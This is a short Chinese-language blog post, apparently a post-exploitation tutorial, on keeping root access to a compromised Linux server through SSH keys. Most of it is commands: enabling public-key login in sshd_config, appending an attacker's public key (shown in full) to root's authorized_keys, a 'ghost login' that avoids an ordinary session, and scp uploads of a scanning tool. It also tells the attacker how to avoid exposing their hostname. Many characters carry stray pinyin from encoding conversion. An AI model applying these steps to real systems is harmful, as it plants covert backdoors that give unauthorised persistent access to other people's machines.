0x00 前提

以前的老東西，拿出水一篇

一般是通過 Rce，提權(quán)等等情況，拿到目標(biāo) linux 的 root 權(quán)限

主要是沒有密碼， hash 跑不出來，機(jī)器無法正常出網(wǎng)

就可以去試著正向鏈接

0x01 首先目標(biāo)主機(jī)，修改目標(biāo) Ssh 服務(wù)配置

啟用ssh證書登錄，并重啟SSH 服務(wù)

echo RSAAuthentication yes >> /etc/ssh/sshd_config
echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
systemctl restart sshd

0x02 本地linux上生成密鑰

# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa

注意：這一步最好去一個純凈的Linux生成，因?yàn)檫@個key會暴露你的主機(jī)名

//找見id_rsa.pub自行拷貝出來
ls -al /root/.ssh/
cp /root/.ssh/id_rsa.pub /home/xxxx/Desktop/
//賦于權(quán)限
chmod 777 /home/xxxx/Desktop/id_rsa.pub

id_rsa(私鑰)
id_rsa.pub(公鑰)

0x03 linux目標(biāo)機(jī)寫入公鑰

自行上傳公鑰到內(nèi)網(wǎng)linux,并將其保存到/root/.ssh/目錄下,文件名改為authorized_keys，或者命令執(zhí)行用echo追加

如目標(biāo)已事先存在authorized_keys文件,直接往最后追加即可

注意：再操作之前要對原authorized_keys進(jìn)行“備份”，以備不時之需。

# echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8Zrks74SYQ4JzKFvYPyL2tG+Scx/y/gIDk5znJF6XKjJ2MFS7RfsjKqpRk7bb+bDpgb5awiMzMOUgwBDheJKerji9/FD+jHEI133ejCZphiPL0+OItLdl7uUt+NFMMPNeXh9lmDOwApxVg54xhDjyzWYaV6xQgvWuZK+6qNBD1TW2/zXImeHpC+L37KQSgFvtxyOiYw/Uq/Caoa9VkcFsUsJ1ftmKSh7unkEJiJAHpzmI0SquNdrgTJ5AiVclQbTa8viyl+irXYjUyvxWKCqBhMhuQQFEMRdViVStgSRoVREEH361J7T7oCC0rJE2XV8MlejXZGi7if34gYHYgyBKvEQ9/Ff+fkQV5LXdZLkC0h3wOBLV9lWwMamlFSjJMTSBlZP1syHYV/X1YNO76SmLUUi48PwDQa52g0tI2TusDmjgARWxwhCndu463dwbCcGjfHnSEAWEB2WGJcKOcpfGLUrdDt9My/d26dfMTNdlaw+kdnDVlYvk0qnyBBZhyfE= Zeo@ZeoMacBook-Pro.local >> /root/.ssh/authorized_keys

0x04 幽靈登錄

ssh -T root@192.168.1.1 /usr/bin/bash -i

0x05 利用Scp 無密碼互傳文件

scp -P 22 -r /root/fsacn root@10.211.55.11:/usr/tmp/fsacn